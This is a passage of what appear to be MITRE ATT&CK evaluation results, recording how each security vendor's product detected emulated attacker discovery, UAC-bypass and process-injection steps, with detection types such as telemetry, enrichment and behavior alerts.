A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Permission Groups Discovery). The alert was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Endgame
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation, so it is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Enrichment (Tainted)
The capability enriched net.exe with an alert for Enumeration of Administrator Account (tainted by a parent Malicious File Detection). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing net.exe with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker enumerated the Shockwave domain's Domain Administrators group. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
F-Secure
Enrichment
The capability enriched net.exe indicating it is commonly used for reconnaissance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running net) has been tagged for monitoring because its parent process has a detection (rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed cmd.exe executing net.exe with command-line arguments and enriched the command with the conditions Net Group Reconnaissance Command and Net LocalGroup Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. The conditions contributing to Enrichment were added to the capability's detection after the start of the evaluation, so this detection is identified as a configuration change. See the Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and Technique (Permission Groups Discovery) and a suspicious indicator that information of users/groups was obtained. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Microsoft
General Behavior (Delayed)
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry
Telemetry showed the execution sequence of cmd.exe running net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment (Tainted)
The capability enriched the execution of net.exe as the execution of an enumeration command, and the execution of net1.exe as the execution of an enumeration command using net or net1. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment (Tainted)
The capability enriched the execution of net.exe and net1.exe as the possible enumeration of administrator groups. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
RSA
Telemetry
Telemetry showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
Enrichment
An "IIOC" module called "Enumerates domain administrators" was generated and provided enrichment. [1] [2] [3] [4] [5] [6]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5]
Carbon Black
Telemetry
Telemetry within the process tree showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched net.exe with the correct ATT&CK Technique (Account Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
CrowdStrike
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran net.exe) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Cybereason
Enrichment (Tainted)
The capability enriched net.exe executing with the correct ATT&CK Technique (Account Discovery). The data was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Endgame
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing net.exe with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation, so it is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net user as a reconnaissance command performed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability enriched net.exe with an alert for Net User Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1087 - Account Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
General Behavior
A General Behavior alert was generated for rundll32.exe launching cmd.exe (executing net), which was identified as extremely rare and suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched net.exe with a tag identifying the command as enumeration. [1] [2] [3] [4] [5] [6] [7] [8] [9]
GoSecure
Enrichment (Tainted)
The capability showed cmd.exe executing net.exe with command-line arguments and enriched the command with the condition Net User Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. [1] [2] [3] [4] [5]
McAfee
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and a related Technique (System Owner/User Discovery) and a suspicious indicator that information of users/groups was obtained. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Microsoft
Telemetry
Telemetry showed the execution sequence of cmd.exe running net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
General Behavior (Delayed)
A delayed General Behavior alert occurred due to a sequence of exploration commands that was classified as suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Palo Alto Networks
Enrichment (Tainted)
The capability enriched the execution of net.exe as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
RSA
Telemetry
Telemetry showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7] [8]
Carbon Black
Enrichment
The capability enriched net.exe with the correct ATT&CK Technique (Account Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry
Telemetry within the process tree showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
CrowdStrike
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net user was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Cybereason
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment (Tainted)
The capability enriched net.exe executing with the correct ATT&CK Technique (Account Discovery). The data was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Endgame
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing net.exe with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation, so it is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net user as a reconnaissance command performed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability enriched net.exe with an alert for Net User Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1087 - Account Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (net) had been tagged for monitoring because its parent process (cmd.exe) had a detection. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched net.exe with a tag identifying the command as enumeration. [1] [2] [3] [4] [5] [6] [7] [8] [9]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed cmd.exe executing net.exe with command-line arguments and enriched the command with the conditions Reconnaissance Tool and Net User Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. One condition contributing to Enrichment was added to the capability's detection after the start of the evaluation, so this detection is identified as a configuration change. See Configuration page for details. [1] [2] [3] [4] [5]
McAfee
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and a related Technique (System Owner/User Discovery) and a suspicious indicator that information of users/groups was obtained. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Microsoft
General Behavior (Delayed)
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Telemetry
Telemetry showed the execution sequence of cmd.exe running net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Palo Alto Networks
Enrichment (Tainted)
The capability enriched the execution of net.exe as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability enriched net1.exe executing with the correct ATT&CK Technique (Account Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
RSA
Telemetry
Telemetry showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7] [8]
Carbon Black
Enrichment
The capability enriched reg.exe with the correct ATT&CK Technique (T1012 - Query Registry). [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry within the process tree showed cmd.exe executing reg.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8]
CrowdStrike
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran reg) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because reg query was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Cybereason
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg with command-line arguments. The telemetry was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5]
Endgame
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation, so it is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing reg.exe with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7] [8] [9]
FireEye
Enrichment
The capability enriched reg.exe with an alert for Reg Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1012 - Query Registry) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because the attacker queried a registry key that contains system policy configurations. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
Enrichment
The capability enriched reg.exe indicating that a sensitive registry key was accessed, possibly as part of reconnaissance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
General Behavior
A General Behavior alert was generated for rundll32.exe launching cmd.exe (which executed reg), which was identified as extremely rare and suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry
Telemetry showed cmd.exe executing reg with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running reg) had been tagged for monitoring because its parent process (rundll32.exe) had a detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
GoSecure
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg.exe with command-line arguments. The telemetry was tainted by the parent Script File Created alert. [1] [2] [3] [4] [5]
McAfee
Enrichment
The capability enriched reg.exe with the correct ATT&CK Tactic (Discovery) and Technique (Query Registry) and a suspicious indicator that the Registry was queried via execution of the reg.exe utility. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Enrichment
The capability enriched reg.exe with the correct ATT&CK Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. Though not visible in the image, MITRE confirmed that the relevant command was visible within the trace detection's process tree. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence of cmd.exe running reg.exe with command-line arguments (tainted by the alert on suspicious sequence of exploration activities from child processes of rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Enrichment
The capability enriched reg.exe executing with the correct ATT&CK Technique (Query Registry). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
RSA
Telemetry
Telemetry showed cmd.exe executing reg.exe with command-line arguments. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing reg.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
Telemetry
Telemetry showed an integrity level change for user Debbie from 8192 (0x2000/Medium) to 12288 (0x3000/High), which is indicative of bypassing UAC. [1] [2] [3] [4]
Cybereason
Telemetry (Tainted)
Telemetry showed powershell.exe running at medium integrity as user Debbie, then another instance running later at high integrity as user Debbie. The telemetry was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5]
Endgame
Telemetry
Telemetry showed a mismatch between the logon id (authentication id) of parent and child processes, indicating that a different token was used. Though no screenshot for this data is available, this information can be used to trace back to the logon event for that logon id and display the process integrity level indicative of the elevated token used for Bypass UAC. During the evaluation, Windows Defender was unknowingly re-enabled. As a result, Bypass UAC was tested using a slightly modified method. The detection method Endgame exhibited would have been valid regardless. [1] [2] [3]
FireEye
Telemetry (Configuration Change)
Telemetry showed execution of powershell.exe as a high integrity process as SYSTEM with a token login ID previously associated with user Debbie. A Configuration Change was made in order to collect Windows Event Logs for events 4627 (Group Membership Information) and 4673 (A privileged service was called). [1] [2] [3] [4]
F-Secure
Enrichment
The capability enriched an unelevated svchost.exe spawning an elevated powershell.exe process with a tag indicating a possible UAC Bypass. [1] [2] [3]
GoSecure
None
No detection capability demonstrated for this procedure, though an alert was triggered due to svchost.exe creating the process powershell.exe. [1] [2] [3]
McAfee
Specific Behavior
A Specific Behavior alert was generated for a possible UAC bypass. The alert was tagged with the correct ATT&CK Technique (Bypass User Account Control) and Tactics (Defense Evasion, Privilege Escalation). [1] [2] [3]
Microsoft
Telemetry (Tainted)
Telemetry showed rundll32.exe as a medium integrity process as user Debbie and subsequent execution of powershell.exe as a high integrity process as SYSTEM as part of the UAC bypass (tainted by alert on a suspicious PowerShell command-line generated for the svchost.exe invocation of powershell.exe with an encoded script). [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Telemetry
Telemetry showed a process integrity level change from parent rundll32.exe (medium / 8192) to child powershell.exe (high / 12288), both running as user Debbie. [1] [2] [3] [4]
RSA
None
No detection capability demonstrated for this procedure, though an alert was created for PowerShell with the -enc command-line argument. [1]
SentinelOne
Telemetry
Telemetry showed process integrity levels changing from medium to high. The detection was verified, but a screenshot for this data was unavailable. Integrity level values are based on how the capability tracks integrity levels rather than how Windows tracks them, which causes the difference in values. [1]
Carbon Black
Telemetry
Telemetry showed svchost.exe, with the seclogon command-line argument, performing activity related to token manipulation. [1] [2] [3] [4]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1]
Cybereason
None
No detection capability demonstrated for this procedure, though an alert was generated for malicious code injection into PowerShell. Telemetry also showed that bypassuactoken.x64.dll was loaded. [1] [2] [3]
Endgame
Telemetry
Telemetry showed a svchost.exe seclogon event for a token logon id (authentication id) later used by a new powershell.exe process, highlighting token manipulation via a mismatch in ids between parent and child process tokens. During the evaluation, Windows Defender was unknowingly re-enabled. As a result, Bypass UAC was tested using a slightly modified method. The detection method Endgame exhibited would have been valid regardless. [1] [2] [3] [4]
FireEye
Telemetry (Configuration Change)
Telemetry showed a svchost.exe seclogon event for a token logon ID later used by a process whose group membership indicated high integrity. A Configuration Change was made in order to collect Windows Event Logs for events 4627 (Group Membership Information) and 4673 (A privileged service was called). [1] [2] [3] [4]
F-Secure
Telemetry
Telemetry showed svchost.exe executed with the seclogon command-line argument and a subsequent logon event for user Debbie with an elevated token, indicating token manipulation. [1] [2] [3]
GoSecure
None
No detection capability demonstrated for this procedure, though an alert was triggered due to svchost.exe creating the process powershell.exe. [1] [2]
McAfee
Telemetry (Delayed)
Telemetry showed svchost.exe with the seclogon command-line argument, as well as a New Credentials logon event for user Debbie, indicating token manipulation. [1] [2] [3]
Microsoft
Telemetry (Tainted)
Telemetry showed svchost.exe executed with the seclogon command-line argument and a subsequent elevated powershell.exe process, indicating token manipulation (tainted by parent alert on a suspicious PowerShell command-line generated for the svchost.exe invocation of powershell.exe with an encoded script). [1] [2] [3] [4] [5]
Palo Alto Networks
Telemetry
Telemetry showed svchost.exe executed with the seclogon command-line argument and a subsequent logon event with an elevated token and new logon ID, indicating token manipulation. [1] [2] [3]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure.
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Endgame
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
F-Secure
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
GoSecure
None
No detection capability demonstrated for this procedure. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Microsoft
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
Palo Alto Networks
Enrichment (Tainted)
The capability enriched the execution of a specific API call as process enumeration and suspicious activity. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. The process tree showing taintedness is visible within the same UI but did not fit within the current frame. [1] [2] [3] [4] [5] [6] [7] [8] [9]
RSA
None
No detection capability demonstrated for this procedure. [1] [2] [3]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2] [3]
Carbon Black
Specific Behavior
A Specific Behavior alert was generated that was mapped to the correct ATT&CK Technique (Process Injection). [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed "crossproc" events indicative of Process Injection into cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8]
CrowdStrike
General Behavior (Delayed, Tainted)
OverWatch also generated a General Behavior alert identifying the injection as suspicious. The process tree view showed the alert as tainted by previous svchost.exe and powershell.exe detections. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5]
Specific Behavior (Tainted)
A Specific Behavior alert was generated showing that PowerShell created a thread into a remote process. The alert identified the correct ATT&CK Technique (Process Injection) and Tactic (Defense Evasion). The process tree view showed the alert as tainted by parent svchost.exe and powershell.exe detections. [1] [2] [3] [4] [5]
Telemetry
Telemetry associated with the alert would show thread creation in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1] [2] [3] [4] [5]
Cybereason
Specific Behavior (Tainted)
A Specific Behavior alert was generated for process injection from powershell.exe into cmd.exe (Anonymous RWX). The alert was tagged with the correct ATT&CK Tactic (Defense Evasion) and Technique (Process Injection). The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Specific Behavior
A Specific Behavior alert was generated for process injection into cmd.exe. [1] [2] [3] [4] [5]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified a process injection from PowerShell.exe to cmd.exe. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. The vendor stated the process injection detection capability is an HX plugin that is only available within the Managed Defense Service, and the data is reported to a separate cloud server which is not accessible to customers at this time. [1] [2]
F-Secure
Specific Behavior
A Specific Behavior alert was generated for PowerShell opening a handle to a system process with access rights typical for a known PowerShell injection pattern, identified as a sign of code injection. [1] [2]
GoSecure
Specific Behavior (Tainted)
A Specific Behavior alert was generated based on DLL injection for powershell.exe injecting into cmd.exe. The detection was labeled with Process Hijacking and Privilege Escalation and tainted by the parent "Powershell process created" alert. The vendor noted all DLL injection conditions are labeled with Privilege Escalation. The vendor also noted Privilege Escalation is one of ten "Capabilities" that are part of the taxonomy. [1] [2] [3] [4] [5] [6] [7] [8]
McAfee
Specific Behavior
A Specific Behavior alert was generated for a process injection from PowerShell into cmd.exe, based on both processes connecting to a named pipe. The alert was tagged with the correct ATT&CK Technique (Process Injection) and Tactics (Defense Evasion, Privilege Escalation). [1] [2] [3]
Microsoft
Specific Behavior (Delayed)
A Specific Behavior alert was generated for process injection. The process injection attempt was audited by Exploit Guard. The vendor states that the Exploit Guard audit events demonstrate that execution would have been prevented if Export Address Table (EAF) had been enabled in blocking mode. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment (Tainted)
The capability enriched data showing powershell.exe injecting into cmd.exe (tainted by alert on a suspicious PowerShell command-line generated for the svchost.exe invocation of powershell.exe with an encoded script). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Palo Alto Networks
Specific Behavior (Tainted)
A Specific Behavior alert was generated for PowerShell injecting shellcode. The alert was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. The process tree showing taintedness is visible within the same UI but did not fit within the current frame. [1] [2] [3] [4]
RSA
Telemetry
Telemetry showed powershell.exe creating a remote thread into cmd.exe. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe allocating memory, writing to memory space, and invoking a thread into cmd.exe (tainted by association with parent alert for powershell.exe process executed by svchost.exe). [1] [2] [3]
Carbon Black
Enrichment
The capability enriched net.exe with a related ATT&CK technique (Account Discovery). [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry within the process tree showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
CrowdStrike
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because net group was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability showed net.exe executing with command-line arguments and enriched the command with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry
Telemetry within the enrichment showed net.exe executing with command-line arguments, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed)
OverWatch also generated a General Behavior alert identifying cmd.exe executing net as suspicious. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Cybereason
General Behavior (Tainted)
A General Behavior alert was generated for net.exe executing as part of a suspicious execution chain related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Telemetry
Telemetry showed the process creation of net group with command-line arguments. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6]
Enrichment (Delayed)
The capability enriched the net command with a related ATT&CK Technique (T1069 - Permission Groups Discovery) and the correct Tactic (Discovery). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6]
FireEye
Enrichment
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1069 - Permission Groups Discovery) and the correct Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it indicated net group was one of the reconnaissance commands performed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
F-Secure
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched net.exe indicating that it was run with commands commonly used for reconnaissance. [1] [2] [3] [4] [5] [6]
GoSecure
Enrichment (Configuration Change, Tainted)
